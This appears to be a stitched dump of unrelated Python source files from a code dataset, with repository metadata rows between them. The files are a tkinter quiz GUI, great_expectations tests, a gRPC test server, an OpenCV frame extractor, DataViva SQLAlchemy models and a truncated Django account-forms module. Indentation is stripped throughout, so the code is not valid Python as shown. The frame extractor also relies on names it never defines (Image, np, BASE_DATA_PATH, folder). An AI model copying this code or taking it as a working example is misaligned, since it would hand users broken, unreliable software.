] | 13 | 2021-10-03T13:10:13.000Z | 2022-01-16T15:17:34.000Z | Anime Quiz/ui.py | Samarth-Khatri/Hacktoberfest-2022 | 8111665e074528634e124d93e277ac4a45e94bc7 | [
"MIT"
] | 18 | 2021-10-03T12:44:40.000Z | 2022-03-12T01:02:33.000Z | Anime Quiz/ui.py | Samarth-Khatri/Hacktoberfest-2022 | 8111665e074528634e124d93e277ac4a45e94bc7 | [
"MIT"
] | 46 | 2021-10-03T12:35:37.000Z | 2021-12-20T04:02:03.000Z | from tkinter import *
from quiz_brain import QuizBrain
THEME_COLOR = "#375362"
class QuizzGui:
def __init__(self,quiz_brain:QuizBrain):
self.window = Tk()
self.quiz = quiz_brain
self.window.title("quizz")
self.window.config(bg = THEME_COLOR,padx = 20,pady = 20)
self.scorelable = Label(text = "score =",bg = THEME_COLOR, font =("Courier", 18),fg = 'white' )
self.scorelable.grid(row =0,column = 1)
self.whitescreen = Canvas(bg ="white", height = 250, width = 300)
self.questiontext = self.whitescreen.create_text(150,125,width = 280,text = "some question",fill =THEME_COLOR, font = ("Arial",18))
self.whitescreen.grid(row = 1,column =0,columnspan = 2,pady = 50)
self.rightImage = PhotoImage(file = "images/false.png")
self.correctImage = PhotoImage(file = "images/true.png")
self.rightbutton = Button(image = self.rightImage,border = 0,command =self.rightanswer)
self.rightbutton.grid(row = 2, column = 0,padx = 40)
self.correctbutton = Button(image = self.correctImage,border = 0,command =self.correctanswer )
self.correctbutton.grid(row = 2, column = 1,padx = 40)
self.get_next_question()
self.window.mainloop()
def get_next_question(self):
if self.quiz.still_has_questions():
q_text = self.quiz.next_question()
self.scorelable.config(text = f"Score = {self.quiz.score}")
self.whitescreen.itemconfig(self.questiontext,text = q_text)
else :
self.whitescreen.itemconfig(self.questiontext, text="You have completed the quiz")
self.rightbutton.config(state ="disabled ")
self.correctbutton.config(state = "disabled")
def rightanswer(self):
self.get_feedback(self.quiz.check_answer("True"))
def correctanswer(self):
self.get_feedback(self.quiz.check_answer("False"))
def get_feedback(self,isright):
if isright:
self.window.after(1000,self.greencolour)
else:
self.window.after(500,self.redcolour)
def greencolour(self):
self.whitescreen.configure(bg= "green")
self.window.after(500,self.whitecolour)
def redcolour(self):
self.whitescreen.configure( bg="red")
self.window.after(500,self.whitecolour)
def whitecolour(self):
self.whitescreen.configure( bg = "white")
self.window.after(500, self.get_next_question)
| 38.765625 | 139 | 0.648932 |
795af16a67cc8eb354a1c585cd8fa7110524f8e2 | 3,195 | py | Python | tests/data_context/test_data_context_store_configs.py | cicdw/great_expectations | 0aecddf7da591df19389c8abadbb1700a51b8739 | [
"Apache-2.0"
] | 2 | 2020-05-07T18:16:17.000Z | 2020-05-07T18:16:21.000Z | tests/data_context/test_data_context_store_configs.py | cicdw/great_expectations | 0aecddf7da591df19389c8abadbb1700a51b8739 | [
"Apache-2.0"
] | 1 | 2020-03-26T12:34:24.000Z | 2020-03-26T12:34:24.000Z | tests/data_context/test_data_context_store_configs.py | cicdw/great_expectations | 0aecddf7da591df19389c8abadbb1700a51b8739 | [
"Apache-2.0"
] | null | null | null | import pytest
import os
from ruamel.yaml import YAML
yaml = YAML()
yaml.default_flow_style = False
import great_expectations as ge
@pytest.fixture(scope="function")
def totally_empty_data_context(tmp_path_factory):
# NOTE: This sets up a DataContext with a real path and a config saved to that path.
# Now that BaseDataContext exists, it's possible to test most DataContext methods without touching the file system.
# However, as of 2019/08/22, most tests still use filesystem-based fixtures.
# TODO: Where appropriate, switch DataContext tests to the new method.
project_root_dir = str(tmp_path_factory.mktemp('totally_empty_data_context'))
os.mkdir(os.path.join(project_root_dir, 'great_expectations'))
config = {
"config_version": 1,
"plugins_directory": "plugins/",
"evaluation_parameter_store_name": "not_a_real_store_name",
"validations_store_name": "another_fake_store",
"expectations_store_name": "expectations_store",
"datasources": {},
"stores": {
"expectations_store": {
"class_name": "ExpectationsStore",
"store_backend": {
"class_name": "TupleFilesystemStoreBackend",
"base_directory": "expectations/"
}
},
},
"data_docs_sites": {},
"validation_operators": {}
}
with open(os.path.join(project_root_dir, "great_expectations/great_expectations.yml"), 'w') as config_file:
yaml.dump(
config,
config_file
)
context = ge.data_context.DataContext(os.path.join(project_root_dir, "great_expectations"))
# print(json.dumps(context._project_config, indent=2))
return context
def test_create(tmp_path_factory):
project_path = str(tmp_path_factory.mktemp('path_001'))
context = ge.data_context.DataContext.create(project_path)
assert isinstance(context, ge.data_context.DataContext)
def test_add_store(totally_empty_data_context):
assert len(totally_empty_data_context.stores.keys()) == 1
totally_empty_data_context.add_store(
"my_new_store",
{
"module_name": "great_expectations.data_context.store",
"class_name": "ValidationsStore"
}
)
assert "my_new_store" in totally_empty_data_context.stores.keys()
assert len(totally_empty_data_context.stores.keys()) == 2
def test_default_config_yml_stores(tmp_path_factory):
project_path = str(tmp_path_factory.mktemp('totally_empty_data_context'))
context = ge.data_context.DataContext.create(project_path)
assert set(context.stores.keys()) == {
"expectations_store",
"validations_store",
"evaluation_parameter_store"
}
context.add_store(
"my_new_validations_store",
{
"module_name": "great_expectations.data_context.store",
"class_name": "ValidationsStore",
}
)
assert set(context.stores.keys()) == {
"expectations_store",
"validations_store",
"evaluation_parameter_store",
"my_new_validations_store"
}
| 33.989362 | 119 | 0.663537 |
795af1d85edb54adc25d7759660b8409f733cd86 | 1,065 | py | Python | src/rpcs/services/ws_rpc_server.py | Qinnnnnn/Watero_DataCenter | fc56dc13fa9a71817de9243b494dc01ab1d193bd | [
"MIT"
] | null | null | null | src/rpcs/services/ws_rpc_server.py | Qinnnnnn/Watero_DataCenter | fc56dc13fa9a71817de9243b494dc01ab1d193bd | [
"MIT"
] | null | null | null | src/rpcs/services/ws_rpc_server.py | Qinnnnnn/Watero_DataCenter | fc56dc13fa9a71817de9243b494dc01ab1d193bd | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
File : ws_rpc_server.py
Author : Zerui Qin
CreateDate : 2018-12-28 10:00:00
LastModifiedDate : 2018-12-28 10:00:00
Note : RPC服务端测试脚本
"""
import time
from concurrent import futures
import grpc
from src.rpcs.protos import data_pipe_pb2
from src.rpcs.protos import data_pipe_pb2_grpc
_ONE_DAY_IN_SECONDS = 60 * 60 * 24
_HOST = 'localhost'
_PORT = '6000'
class DataFlow(data_pipe_pb2_grpc.DataFlowServicer):
def TransmitData(self, request, context):
index = request.index
msg = request.msg
print(f'{index}: {msg}')
return data_pipe_pb2.TransmitReply(status=0)
def serve():
grpc_server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
data_pipe_pb2_grpc.add_DataFlowServicer_to_server(DataFlow(), grpc_server)
grpc_server.add_insecure_port(_HOST + ':' + _PORT)
grpc_server.start()
try:
while True:
time.sleep(_ONE_DAY_IN_SECONDS)
except KeyboardInterrupt:
grpc_server.stop(0)
if __name__ == '__main__':
serve()
| 22.1875 | 78 | 0.702347 |
795af224a79a0c33f0c59b2857ae15d7ee9518b0 | 1,402 | py | Python | Externals/DeepLeague/Data Scripts/save_frames.py | yedhrab/LolRehberi | e3d0e24a63fbbdc7cba0fd6016364fb2fd105c72 | [
"Apache-2.0"
] | 2 | 2018-01-19T23:34:43.000Z | 2018-05-07T09:52:53.000Z | Externals/DeepLeague/Data Scripts/save_frames.py | yedhrab/LolRehberi | e3d0e24a63fbbdc7cba0fd6016364fb2fd105c72 | [
"Apache-2.0"
] | null | null | null | Externals/DeepLeague/Data Scripts/save_frames.py | yedhrab/LolRehberi | e3d0e24a63fbbdc7cba0fd6016364fb2fd105c72 | [
"Apache-2.0"
] | 2 | 2018-03-02T06:45:01.000Z | 2019-03-13T11:59:13.000Z | import cv2
def get_frames(test_mp4_vod_path, save_path):
video = cv2.VideoCapture(test_mp4_vod_path)
print("Opened ", test_mp4_vod_path)
print("Processing MP4 frame by frame")
# forward over to the frames you want to start reading from.
# manually set this, fps * time in seconds you wanna start from
video.set(1, 0);
success, frame = video.read()
count = 0
file_count = 0
success = True
fps = int(video.get(cv2.CAP_PROP_FPS))
total_frame_count = int(video.get(cv2.CAP_PROP_FRAME_COUNT))
print("Loading video %d seconds long with FPS %d and total frame count %d " % (total_frame_count/fps, fps, total_frame_count))
while success:
success, frame = video.read()
if not success:
break
if count % 1000 == 0:
print("Currently at frame ", count)
# i save once every fps, which comes out to 1 frames per second.
# i think anymore than 2 FPS leads to to much repeat data.
if count % fps == 0:
im = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
im = Image.fromarray(frame)#.crop((1625, 785, 1920, 1080))
im = np.array(im, dtype = np.uint8)
cv2.imwrite(BASE_DATA_PATH + "/%s/frames/frame_%d.jpg" % (folder, file_count), im)
file_count += 1
count += 1
print("Saved %d frames" % (file_count) )
video.release()
| 36.894737 | 130 | 0.624822 |
795af2dfa58324fdf84f88ddb17ff746b3888716 | 20,428 | py | Python | dataviva/attrs/models.py | Btaras/dataviva | b850ef66a2db81195709e8a8b08b778de43bf354 | [
"MIT"
] | null | null | null | dataviva/attrs/models.py | Btaras/dataviva | b850ef66a2db81195709e8a8b08b778de43bf354 | [
"MIT"
] | null | null | null | dataviva/attrs/models.py | Btaras/dataviva | b850ef66a2db81195709e8a8b08b778de43bf354 | [
"MIT"
] | null | null | null | from dataviva import db, __latest_year__
from dataviva.utils import AutoSerialize, exist_or_404, title_case
from sqlalchemy import func, Float
from sqlalchemy.sql.expression import cast
from decimal import *
from flask import g
''' A Mixin class for retrieving quick stats about a particular attribute'''
class Stats(object):
def stats(self):
from dataviva.attrs.models import Yb
from dataviva.rais.models import Ybi, Ybo, Yio, Yb_rais, Yi, Yo
from dataviva.secex.models import Ybp, Ybw, Ypw, Yb_secex, Yp, Yw
stats = []
attr_type = self.__class__.__name__.lower()
if attr_type == "wld" and self.id == "all":
attr_type = "bra"
if attr_type == "bra" and self.id == "all":
stats.append(self.get_val(Yb,"population",attr_type,"population"))
stats.append(self.get_top_attr(Yi, "num_emp", attr_type, "isic", "rais"))
stats.append(self.get_top_attr(Yo, "num_emp", attr_type, "cbo", "rais"))
stats.append(self.get_val(Yi, "wage", attr_type, "rais"))
stats.append(self.get_top_attr(Yp, "val_usd", attr_type, "hs", "secex"))
stats.append(self.get_top_attr(Yw, "val_usd", attr_type, "wld", "secex"))
stats.append(self.get_val(Yp, "val_usd", attr_type, "secex"))
elif attr_type == "bra":
stats.append(self.get_val(Yb,"population",attr_type,"population"))
stats.append(self.get_top_attr(Ybi, "num_emp", attr_type, "isic", "rais"))
stats.append(self.get_top_attr(Ybo, "num_emp", attr_type, "cbo", "rais"))
stats.append(self.get_val(Yb_rais, "wage", attr_type, "rais"))
stats.append(self.get_top_attr(Ybp, "val_usd", attr_type, "hs", "secex"))
stats.append(self.get_top_attr(Ybw, "val_usd", attr_type, "wld", "secex"))
stats.append(self.get_val(Yb_secex, "val_usd", attr_type, "secex"))
elif attr_type == "isic":
dataset = "rais"
stats.append(self.get_top_attr(Ybi, "num_emp", attr_type, "bra", dataset))
stats.append(self.get_top_attr(Yio, "num_emp", attr_type, "cbo", dataset))
stats.append(self.get_val(Yi, "wage", attr_type, dataset))
stats.append(self.get_val(Yi, "wage_avg", attr_type, dataset))
stats.append(self.get_val(Yi, "wage_avg", attr_type, dataset, __latest_year__[dataset]-5))
elif attr_type == "cbo":
dataset = "rais"
stats.append(self.get_top_attr(Ybo, "num_emp", attr_type, "bra", dataset))
stats.append(self.get_top_attr(Yio, "num_emp", attr_type, "isic", dataset))
stats.append(self.get_val(Yo, "wage", attr_type, dataset))
stats.append(self.get_val(Yo, "wage_avg", attr_type, dataset))
stats.append(self.get_val(Yo, "wage_avg", attr_type, dataset, __latest_year__[dataset]-5))
elif attr_type == "hs":
dataset = "secex"
stats.append(self.get_top_attr(Ybp, "val_usd", attr_type, "bra", dataset))
stats.append(self.get_top_attr(Ypw, "val_usd", attr_type, "wld", dataset))
stats.append(self.get_val(Yp, "val_usd_growth_pct", attr_type, dataset))
stats.append(self.get_val(Yp, "val_usd_growth_pct_5", attr_type, dataset))
stats.append(self.get_val(Yp, "val_usd", attr_type, dataset))
stats.append(self.get_val(Yp, "val_usd", attr_type, dataset, __latest_year__[dataset]-5))
elif attr_type == "wld":
dataset = "secex"
stats.append(self.get_top_attr(Ybw, "val_usd", attr_type, "bra", dataset))
stats.append(self.get_top_attr(Ypw, "val_usd", attr_type, "hs", dataset))
stats.append(self.get_val(Yw, "val_usd_growth_pct", attr_type, dataset))
stats.append(self.get_val(Yw, "val_usd_growth_pct_5", attr_type, dataset))
stats.append(self.get_val(Yw, "eci", attr_type, dataset))
stats.append(self.get_val(Yw, "val_usd", attr_type, dataset))
stats.append(self.get_val(Yw, "val_usd", attr_type, dataset, __latest_year__[dataset]-5))
return stats
''' Given a "bra" string from URL, turn this into an array of Bra
objects'''
@staticmethod
def parse_bras(bra_str):
if ".show." in bra_str:
# the '.show.' indicates that we are looking for a specific nesting
bar_id, nesting = bra_str.split(".show.")
# filter table by requested nesting level
bras = Bra.query \
.filter(Bra.id.startswith(bra_id)) \
.filter(func.char_length(Attr.id) == nesting).all()
bras = [b.serialize() for b in bras]
elif "." in bra_str:
# the '.' indicates we are looking for bras within a given distance
bra_id, distance = bra_str.split(".")
bras = exist_or_404(Bra, bra_id)
neighbors = bras.get_neighbors(distance)
bras = [g.bra.serialize() for g in neighbors]
else:
# we allow the user to specify bras separated by '+'
bras = bra_str.split("+")
# Make sure the bra_id requested actually exists in the DB
bras = [exist_or_404(Bra, bra_id).serialize() for bra_id in bras]
return bras
def get_top_attr(self, tbl, val_var, attr_type, key, dataset):
latest_year = __latest_year__[dataset]
if key == "bra":
length = 8
elif key == "isic" or key == "wld":
length = 5
elif key == "cbo":
length = 4
elif key == "hs":
length = 6
if attr_type == "bra":
agg = {'val_usd':func.sum, 'eci':func.avg, 'eci_wld':func.avg, 'pci':func.avg,
'val_usd_growth_pct':func.avg, 'val_usd_growth_pct_5':func.avg,
'val_usd_growth_val':func.avg, 'val_usd_growth_val_5':func.avg,
'distance':func.avg, 'distance_wld':func.avg,
'opp_gain':func.avg, 'opp_gain_wld':func.avg,
'rca':func.avg, 'rca_wld':func.avg,
'wage':func.sum, 'num_emp':func.sum, 'num_est':func.sum,
'ici':func.avg, 'oci':func.avg,
'wage_growth_pct':func.avg, 'wage_growth_pct_5':func.avg,
'wage_growth_val':func.avg, 'wage_growth_val_5':func.avg,
'num_emp_growth_pct':func.avg, 'num_emp_pct_5':func.avg,
'num_emp_growth_val':func.avg, 'num_emp_growth_val_5':func.avg,
'distance':func.avg, 'importance':func.avg,
'opp_gain':func.avg, 'required':func.avg, 'rca':func.avg}
if self.id == "all":
top = tbl.query
else:
bras = self.parse_bras(self.id)
# filter query
if len(bras) > 1:
col_names = ["{0}_id".format(key)]
col_vals = [cast(agg[c](getattr(tbl, c)), Float) if c in agg else getattr(tbl, c) for c in col_names]
top = tbl.query.with_entities(*col_vals).filter(tbl.bra_id.in_([b["id"] for b in bras]))
elif bras[0]["id"] != "all":
top = tbl.query.filter(tbl.bra_id == bras[0]["id"])
else:
top = tbl.query.filter(getattr(tbl, attr_type+"_id") == self.id)
top = top.filter_by(year=latest_year) \
.filter(func.char_length(getattr(tbl, key+"_id")) == length) \
.group_by(getattr(tbl, key+"_id")) \
.order_by(func.sum(getattr(tbl, val_var)).desc())
percent = 0
if top.first() != None:
if isinstance(top.first(),tuple):
obj = globals()[key.title()].query.get(top.first()[0])
percent = None
else:
obj = getattr(top.first(),key)
num = float(getattr(top.first(),val_var))
den = 0
for x in top.all():
value = getattr(x,val_var)
if value:
den += float(value)
percent = (num/float(den))*100
return {"name": "top_{0}".format(key), "value": obj.name(), "percent": percent, "id": obj.id, "group": "{0}_stats_{1}".format(dataset,latest_year)}
else:
return {"name": "top_{0}".format(key), "value": "-", "group": "{0}_stats_{1}".format(dataset,latest_year)}
def get_val(self, tbl, val_var, attr_type, dataset, latest_year = None):
if latest_year == None:
latest_year = __latest_year__[dataset]
if val_var == "wage_avg":
calc_var = val_var
val_var = "wage"
else:
calc_var = None
if attr_type == "bra":
agg = {'population':func.sum, 'val_usd':func.sum, 'eci':func.avg, 'eci_wld':func.avg, 'pci':func.avg,
'val_usd_growth_pct':func.avg, 'val_usd_growth_pct_5':func.avg,
'val_usd_growth_val':func.avg, 'val_usd_growth_val_5':func.avg,
'distance':func.avg, 'distance_wld':func.avg,
'opp_gain':func.avg, 'opp_gain_wld':func.avg,
'rca':func.avg, 'rca_wld':func.avg,
'wage':func.sum, 'num_emp':func.sum, 'num_est':func.sum,
'ici':func.avg, 'oci':func.avg,
'wage_growth_pct':func.avg, 'wage_growth_pct_5':func.avg,
'wage_growth_val':func.avg, 'wage_growth_val_5':func.avg,
'num_emp_growth_pct':func.avg, 'num_emp_pct_5':func.avg,
'num_emp_growth_val':func.avg, 'num_emp_growth_val_5':func.avg,
'distance':func.avg, 'importance':func.avg,
'opp_gain':func.avg, 'required':func.avg, 'rca':func.avg}
if self.id == "all":
col_names = [val_var]
col_vals = [cast(agg[c](getattr(tbl, c)), Float) if c in agg else getattr(tbl, c) for c in col_names]
total = tbl.query.with_entities(*col_vals)
if dataset == "rais":
total = total.filter(func.char_length(getattr(tbl,"isic_id")) == 1)
elif dataset == "secex":
total = total.filter(func.char_length(getattr(tbl,"hs_id")) == 2)
elif dataset == "population":
total = total.filter(func.char_length(getattr(tbl,"bra_id")) == 2)
else:
bras = self.parse_bras(self.id)
# filter query
if len(bras) > 1:
col_names = [val_var]
col_vals = [cast(agg[c](getattr(tbl, c)), Float) if c in agg else getattr(tbl, c) for c in col_names]
total = tbl.query.with_entities(*col_vals).filter(tbl.bra_id.in_([b["id"] for b in bras]))
elif bras[0]["id"] != "all":
total = tbl.query.filter(tbl.bra_id == bras[0]["id"])
else:
total = tbl.query.filter(getattr(tbl, attr_type+"_id") == self.id)
total = total.filter_by(year=latest_year).first()
if total != None:
if isinstance(total,tuple):
val = total[0]
else:
val = getattr(total,val_var)
if calc_var == "wage_avg":
val = float(val)/getattr(total,"num_emp")
else:
val = 0
if val_var == "population":
group = ""
name = "population_{0}".format(latest_year)
else:
group = "{0}_stats_{1}".format(dataset,latest_year)
if calc_var:
name = calc_var
else:
name = "total_{0}".format(val_var)
return {"name": name, "value": val, "group": group}
class Isic(db.Model, AutoSerialize, Stats):
__tablename__ = 'attrs_isic'
id = db.Column(db.String(5), primary_key=True)
name_en = db.Column(db.String(200))
name_pt = db.Column(db.String(200))
desc_en = db.Column(db.Text())
desc_pt = db.Column(db.Text())
keywords_en = db.Column(db.String(100))
keywords_pt = db.Column(db.String(100))
color = db.Column(db.String(7))
gender_pt = db.Column(db.String(1))
plural_pt = db.Column(db.Boolean())
article_pt = db.Column(db.Boolean())
yi = db.relationship("Yi", backref = 'isic', lazy = 'dynamic')
ybi = db.relationship("Ybi", backref = 'isic', lazy = 'dynamic')
yio = db.relationship("Yio", backref = 'isic', lazy = 'dynamic')
ybio = db.relationship("Ybio", backref = 'isic', lazy = 'dynamic')
def name(self):
lang = getattr(g, "locale", "en")
return title_case(getattr(self,"name_"+lang))
def icon(self):
return "/static/img/icons/isic/isic_%s.png" % (self.id[:1])
def __repr__(self):
return '<Isic %r>' % (self.name_en)
class Cbo(db.Model, AutoSerialize, Stats):
__tablename__ = 'attrs_cbo'
id = db.Column(db.String(6), primary_key=True)
name_en = db.Column(db.String(200))
name_pt = db.Column(db.String(200))
desc_en = db.Column(db.Text())
desc_pt = db.Column(db.Text())
keywords_en = db.Column(db.String(100))
keywords_pt = db.Column(db.String(100))
color = db.Column(db.String(7))
gender_pt = db.Column(db.String(1))
plural_pt = db.Column(db.Boolean())
article_pt = db.Column(db.Boolean())
yo = db.relationship("Yo", backref = 'cbo', lazy = 'dynamic')
ybo = db.relationship("Ybo", backref = 'cbo', lazy = 'dynamic')
yio = db.relationship("Yio", backref = 'cbo', lazy = 'dynamic')
ybio = db.relationship("Ybio", backref = 'cbo', lazy = 'dynamic')
def name(self):
lang = getattr(g, "locale", "en")
return title_case(getattr(self,"name_"+lang))
def icon(self):
return "/static/img/icons/cbo/cbo_%s.png" % (self.id[:1])
def __repr__(self):
return '<Cbo %r>' % (self.name_en)
class Hs(db.Model, AutoSerialize, Stats):
__tablename__ = 'attrs_hs'
id = db.Column(db.String(8), primary_key=True)
name_en = db.Column(db.String(200))
name_pt = db.Column(db.String(200))
desc_en = db.Column(db.Text())
desc_pt = db.Column(db.Text())
keywords_en = db.Column(db.String(100))
keywords_pt = db.Column(db.String(100))
color = db.Column(db.String(7))
gender_pt = db.Column(db.String(1))
plural_pt = db.Column(db.Boolean())
article_pt = db.Column(db.Boolean())
yp = db.relationship("Yp", backref = 'hs', lazy = 'dynamic')
ypw = db.relationship("Ypw", backref = 'hs', lazy = 'dynamic')
ybp = db.relationship("Ybp", backref = 'hs', lazy = 'dynamic')
ybpw = db.relationship("Ybpw", backref = 'hs', lazy = 'dynamic')
def name(self):
lang = getattr(g, "locale", "en")
return title_case(getattr(self,"name_"+lang))
def icon(self):
return "/static/img/icons/hs/hs_%s.png" % (self.id[:2])
def __repr__(self):
return '<Hs %r>' % (self.name_en)
############################################################
# ----------------------------------------------------------
# Geography
#
############################################################
class Wld(db.Model, AutoSerialize, Stats):
__tablename__ = 'attrs_wld'
id = db.Column(db.String(5), primary_key=True)
id_2char = db.Column(db.String(2))
id_3char = db.Column(db.String(3))
id_num = db.Column(db.Integer(11))
id_mdic = db.Column(db.Integer(11))
name_en = db.Column(db.String(200))
name_pt = db.Column(db.String(200))
color = db.Column(db.String(7))
gender_pt = db.Column(db.String(1))
plural_pt = db.Column(db.Boolean())
article_pt = db.Column(db.Boolean())
yw = db.relationship("Yw", backref = 'wld', lazy = 'dynamic')
ypw = db.relationship("Ypw", backref = 'wld', lazy = 'dynamic')
ybw = db.relationship("Ybw", backref = 'wld', lazy = 'dynamic')
ybpw = db.relationship("Ybpw", backref = 'wld', lazy = 'dynamic')
def name(self):
lang = getattr(g, "locale", "en")
return title_case(getattr(self,"name_"+lang))
def icon(self):
if self.id == "all":
return "/static/img/icons/wld/wld_sabra.png"
else:
return "/static/img/icons/wld/wld_%s.png" % (self.id)
def __repr__(self):
return '<Wld %r>' % (self.id_3char)
bra_pr = db.Table('attrs_bra_pr',
db.Column('bra_id', db.Integer, db.ForeignKey('attrs_bra.id')),
db.Column('pr_id', db.Integer, db.ForeignKey('attrs_bra.id'))
)
class Bra(db.Model, AutoSerialize, Stats):
__tablename__ = 'attrs_bra'
id = db.Column(db.String(10), primary_key=True)
id_ibge = db.Column(db.Integer(7))
name_en = db.Column(db.String(200))
name_pt = db.Column(db.String(200))
color = db.Column(db.String(7))
gender_pt = db.Column(db.String(1))
plural_pt = db.Column(db.Boolean())
article_pt = db.Column(db.Boolean())
distance = 0
# SECEX relations
yb_secex = db.relationship("Yb_secex", backref = 'bra', lazy = 'dynamic')
ybp = db.relationship("Ybp", backref = 'bra', lazy = 'dynamic')
ybw = db.relationship("Ybw", backref = 'bra', lazy = 'dynamic')
ybpw = db.relationship("Ybpw", backref = 'bra', lazy = 'dynamic')
# RAIS relations
yb_rais = db.relationship("Yb_rais", backref = 'bra', lazy = 'dynamic')
ybi = db.relationship("Ybi", backref = 'bra', lazy = 'dynamic')
ybo = db.relationship("Ybo", backref = 'bra', lazy = 'dynamic')
ybio = db.relationship("Ybio", backref = 'bra', lazy = 'dynamic')
# Neighbors
neighbors = db.relationship('Distances', primaryjoin = "(Bra.id == Distances.bra_id_origin)", backref='bra_origin', lazy='dynamic')
bb = db.relationship('Distances', primaryjoin = "(Bra.id == Distances.bra_id_dest)", backref='bra', lazy='dynamic')
# Planning Regions
pr = db.relationship('Bra',
secondary = bra_pr,
primaryjoin = (bra_pr.c.pr_id == id),
secondaryjoin = (bra_pr.c.bra_id == id),
backref = db.backref('bra', lazy = 'dynamic'),
lazy = 'dynamic')
pr2 = db.relationship('Bra',
secondary = bra_pr,
primaryjoin = (bra_pr.c.bra_id == id),
secondaryjoin = (bra_pr.c.pr_id == id),
backref = db.backref('bra2', lazy = 'dynamic'),
lazy = 'dynamic')
def name(self):
lang = getattr(g, "locale", "en")
return title_case(getattr(self,"name_"+lang))
def icon(self):
return "/static/img/icons/bra/bra_%s.png" % (self.id[:2])
def get_neighbors(self, dist, remove_self=False):
q = self.neighbors.filter(Distances.distance <= dist).order_by(Distances.distance)
if remove_self:
q = q.filter(Distances.bra_id_dest != self.id) # filter out self
return q.all()
def __repr__(self):
return '<Bra %r>' % (self.name_en)
############################################################
# ----------------------------------------------------------
# Attr data
#
############################################################
class Distances(db.Model):
__tablename__ = 'attrs_bb'
bra_id_origin = db.Column(db.String(10), db.ForeignKey(Bra.id), primary_key=True)
bra_id_dest = db.Column(db.String(10), db.ForeignKey(Bra.id), primary_key=True)
distance = db.Column(db.Float())
def __repr__(self):
return '<Bra_Dist %r-%r:%g>' % (self.bra_id_origin, self.bra_id_dest, self.distance)
def serialize(self):
return {
"bra_id_origin": self.bra_id_origin,
"bra_id_dest": self.bra_id_dest,
"distance": self.distance
}
class Yb(db.Model, AutoSerialize):
__tablename__ = 'attrs_yb'
year = db.Column(db.Integer(4), primary_key=True)
bra_id = db.Column(db.String(10), db.ForeignKey(Bra.id), primary_key=True)
population = db.Column(db.Integer)
def __repr__(self):
return '<Yb %r.%r>' % (self.year, self.bra_id)
| 43.743041 | 159 | 0.561044 |
795af2e34e7d98ae61c1386f18c65ddb15a4ae38 | 60 | py | Python | creten/orders/TradeCloseType.py | nardew/Creten | 15ddb0b52e6f2afec2c79b3c731fccb34a2c63d6 | [
"MIT"
] | 9 | 2019-12-17T10:42:40.000Z | 2021-12-02T23:07:05.000Z | creten/orders/TradeCloseType.py | nardew/Creten | 15ddb0b52e6f2afec2c79b3c731fccb34a2c63d6 | [
"MIT"
] | null | null | null | creten/orders/TradeCloseType.py | nardew/Creten | 15ddb0b52e6f2afec2c79b3c731fccb34a2c63d6 | [
"MIT"
] | 6 | 2019-03-04T15:01:10.000Z | 2022-01-12T23:22:55.000Z | class TradeCloseType:
ORDER_DRIVEN = 1
QUANTITY_DRIVEN = 2 | 20 | 21 | 0.8 |
795af3e60ab8ebc185a973681d7192a653d6c427 | 16,596 | py | Python | webapp/apps/account/forms.py | zhiwehu/IBookmark | b416f14f2b7ede4f38a00f386c2cdac01cbd740f | [
"Apache-2.0"
] | 1 | 2020-04-01T11:11:37.000Z | 2020-04-01T11:11:37.000Z | webapp/apps/account/forms.py | zhiwehu/IBookmark | b416f14f2b7ede4f38a00f386c2cdac01cbd740f | [
"Apache-2.0"
] | null | null | null | webapp/apps/account/forms.py | zhiwehu/IBookmark | b416f14f2b7ede4f38a00f386c2cdac01cbd740f | [
"Apache-2.0"
] | 2 | 2019-10-04T06:00:32.000Z | 2021-02-03T08:08:27.000Z | import re
from django import forms
from django.conf import settings
from django.core.mail import send_mail
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _, ugettext
from django.utils.http import int_to_base36
from django.contrib import messages
from django.contrib.auth import authenticate
from django.contrib.auth.models import User
from django.contrib.auth.tokens import default_token_generator
from django.contrib.sites.models import Site
from emailconfirmation.models import EmailAddress
from timezones.forms import TimeZoneField
from models import Account, PasswordReset
from utils import perform_login, change_password
alnum_re = re.compile(r"^\w+$")
# @@@ might want to find way to prevent settings access globally here.
REQUIRED_EMAIL = getattr(settings, "ACCOUNT_REQUIRED_EMAIL", False)
EMAIL_VERIFICATION = getattr(settings, "ACCOUNT_EMAIL_VERIFICATION", False)
EMAIL_AUTHENTICATION = getattr(settings, "ACCOUNT_EMAIL_AUTHENTICATION", False)
UNIQUE_EMAIL = getattr(settings, "ACCOUNT_UNIQUE_EMAIL", False)
PASSWORD_MIN_LENGTH=6
PASSWORD_MAX_LENGTH=20
class GroupForm(forms.Form):
def __init__(self, *args, **kwargs):
self.group = kwargs.pop("group", None)
super(GroupForm, self).__init__(*args, **kwargs)
class LoginForm(GroupForm):
password = forms.CharField(
label=_("Password"),
widget=forms.PasswordInput(render_value=False)
)
remember = forms.BooleanField(
label=_("Remember Me"),
help_text=_("If checked you will stay logged in for 3 weeks"),
required=False
)
user = None
def __init__(self, *args, **kwargs):
super(LoginForm, self).__init__(*args, **kwargs)
ordering = []
if EMAIL_AUTHENTICATION:
self.fields["email"] = forms.EmailField(
label=ugettext("Email"),
)
ordering.append("email")
else:
self.fields["username"] = forms.CharField(
label=ugettext("Username"),
max_length=30,
)
ordering.append("username")
ordering.extend(["password", "remember"])
self.fields.keyOrder = ordering
def user_credentials(self):
"""
Provides the credentials required to authenticate the user for
login.
"""
credentials = {}
if EMAIL_AUTHENTICATION:
credentials["email"] = self.cleaned_data["email"]
else:
credentials["username"] = self.cleaned_data["username"]
credentials["password"] = self.cleaned_data["password"]
return credentials
def clean(self):
if self._errors:
return
user = authenticate(**self.user_credentials())
if user:
if user.is_active:
self.user = user
else:
raise forms.ValidationError(_("This account is currently inactive."))
else:
if EMAIL_AUTHENTICATION:
error = _("The email address and/or password you specified are not correct.")
else:
error = _("The username and/or password you specified are not correct.")
raise forms.ValidationError(error)
return self.cleaned_data
def login(self, request):
perform_login(request, self.user)
if self.cleaned_data["remember"]:
request.session.set_expiry(60 * 60 * 24 * 7 * 3)
else:
request.session.set_expiry(0)
class SignupForm(GroupForm):
username = forms.CharField(
label=_("Username"),
max_length=30,
widget=forms.TextInput()
)
password1 = forms.CharField(
label=_("Password"),
widget=forms.PasswordInput(render_value=False)
)
password2 = forms.CharField(
label=_("Password (again)"),
widget=forms.PasswordInput(render_value=False)
)
email = forms.EmailField(widget=forms.TextInput())
confirmation_key = forms.CharField(
max_length=40,
required=False,
widget=forms.HiddenInput()
)
def __init__(self, *args, **kwargs):
